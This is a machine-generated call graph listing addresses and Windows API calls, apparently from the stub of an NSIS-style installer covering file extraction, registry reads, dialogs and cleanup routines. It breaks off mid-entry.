3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4938 402a84 4939 401553 19 API calls 4938->4939 4940 402a8e 4939->4940 4941 401446 18 API calls 4940->4941 4942 402a98 4941->4942 4943 401a13 4942->4943 4944 402ab2 RegEnumKeyW 4942->4944 4945 402abe RegEnumValueW 4942->4945 4946 402a7e 4944->4946 4945->4943 4945->4946 4946->4943 4947 4029e4 RegCloseKey 4946->4947 4947->4943 4948 402c8a 4949 402ca2 4948->4949 4950 402c8f 4948->4950 4952 40145c 18 API calls 4949->4952 4951 401446 18 API calls 4950->4951 4954 402c97 4951->4954 4953 402ca9 lstrlenW 4952->4953 4953->4954 4955 402ccb WriteFile 4954->4955 4956 401a13 4954->4956 4955->4956 4957 40400d 4958 40406a 4957->4958 4959 40401a lstrcpynA lstrlenA 4957->4959 4959->4958 4960 40404b 4959->4960 4960->4958 4961 404057 GlobalFree 4960->4961 4961->4958 4962 401d8e 4963 40145c 18 API calls 4962->4963 4964 401d95 ExpandEnvironmentStringsW 4963->4964 4965 401da8 4964->4965 4967 401db9 4964->4967 4966 401dad lstrcmpW 4965->4966 4965->4967 4966->4967 4968 401e0f 4969 401446 18 API calls 4968->4969 4970 401e17 4969->4970 4971 401446 18 API calls 4970->4971 4972 401e21 4971->4972 4973 4030e3 4972->4973 4975 405f51 wsprintfW 4972->4975 4975->4973 4976 402392 4977 40145c 18 API calls 4976->4977 4978 402399 4977->4978 4981 4071f8 4978->4981 4982 406ed2 25 API calls 4981->4982 4983 407218 4982->4983 4984 407222 lstrcpynW lstrcmpW 4983->4984 4985 4023a7 4983->4985 4986 407254 4984->4986 4987 40725a lstrcpynW 4984->4987 4986->4987 4987->4985 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4132 401a1f 4133 40145c 18 API calls 4132->4133 4134 401a26 4133->4134 4135 4062a3 11 API calls 4134->4135 4136 401a49 4135->4136 4137 401a64 4136->4137 4138 401a5c 4136->4138 4186 406009 lstrcpynW 4137->4186 4185 406009 lstrcpynW 4138->4185 4141 401a62 4145 406038 5 API calls 4141->4145 4142 401a6f 4143 406722 3 API calls 4142->4143 4144 401a75 lstrcatW 4143->4144 4144->4141 4147 401a81 4145->4147 4146 4062d5 2 API calls 4146->4147 4147->4146 4148 405e30 2 API calls 4147->4148 4150 401a98 CompareFileTime 4147->4150 4151 401ba9 4147->4151 4155 4062a3 11 API calls 4147->4155 4159 406009 lstrcpynW 4147->4159 4165 406805 18 API calls 4147->4165 4172 405ca0 MessageBoxIndirectW 4147->4172 4176 401b50 4147->4176 4183 401b5d 4147->4183 4184 405e50 GetFileAttributesW CreateFileW 4147->4184 4148->4147 4150->4147 4152 404f72 25 API calls 4151->4152 4154 401bb3 4152->4154 4153 404f72 25 API calls 4156 401b70 4153->4156 4157 40337f 37 API calls 4154->4157 4155->4147 4160 4062a3 11 API calls 4156->4160 4158 401bc6 4157->4158 4161 4062a3 11 API calls 4158->4161 4159->4147 4167 401b8b 4160->4167 4162 401bda 4161->4162 4163 401be9 SetFileTime 4162->4163 4164 401bf8 FindCloseChangeNotification 4162->4164 4163->4164 4166 401c09 4164->4166 4164->4167 4165->4147 4168 401c21 4166->4168 4169 401c0e 4166->4169 4171 406805 18 API calls 4168->4171 4170 406805 18 API calls 4169->4170 4173 401c16 lstrcatW 4170->4173 4174 401c29 4171->4174 4172->4147 4173->4174 4175 4062a3 11 API calls 4174->4175 4177 401c34 4175->4177 4178 401b93 4176->4178 4179 401b53 4176->4179 4180 405ca0 MessageBoxIndirectW 4177->4180 4181 4062a3 11 API calls 4178->4181 4182 4062a3 11 API calls 4179->4182 4180->4167 4181->4167 4182->4183 4183->4153 4184->4147 4185->4141 4186->4142 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4078 4021b5 4079 40145c 18 API calls 4078->4079 4080 4021bb 4079->4080 4081 40145c 18 API calls 4080->4081 4082 4021c4 4081->4082 4083 40145c 18 API calls 4082->4083 4084 4021cd 4083->4084 4085 40145c 18 API calls 4084->4085 4086 4021d6 4085->4086 4087 404f72 25 API calls 4086->4087 4088 4021e2 ShellExecuteW 4087->4088 4089 40221b 4088->4089 4090 40220d 4088->4090 4092 4062a3 11 API calls 4089->4092 4091 4062a3 11 API calls 4090->4091 4091->4089 4093 402230 4092->4093 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 5172 404201 5163->5172 5168 40410e 5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 EnableWindow 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 EnableWindow 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4094 401eb9 4095 401f24 4094->4095 4096 401ec6 4094->4096 4097 401f53 GlobalAlloc 4095->4097 4098 401f28 4095->4098 4099 401ed5 4096->4099 4106 401ef7 4096->4106 4100 406805 18 API calls 4097->4100 4105 4062a3 11 API calls 4098->4105 4110 401f36 4098->4110 4101 4062a3 11 API calls 4099->4101 4104 401f46 4100->4104 4102 401ee2 4101->4102 4107 402708 4102->4107 4112 406805 18 API calls 4102->4112 4104->4107 4108 402387 GlobalFree 4104->4108 4105->4110 4116 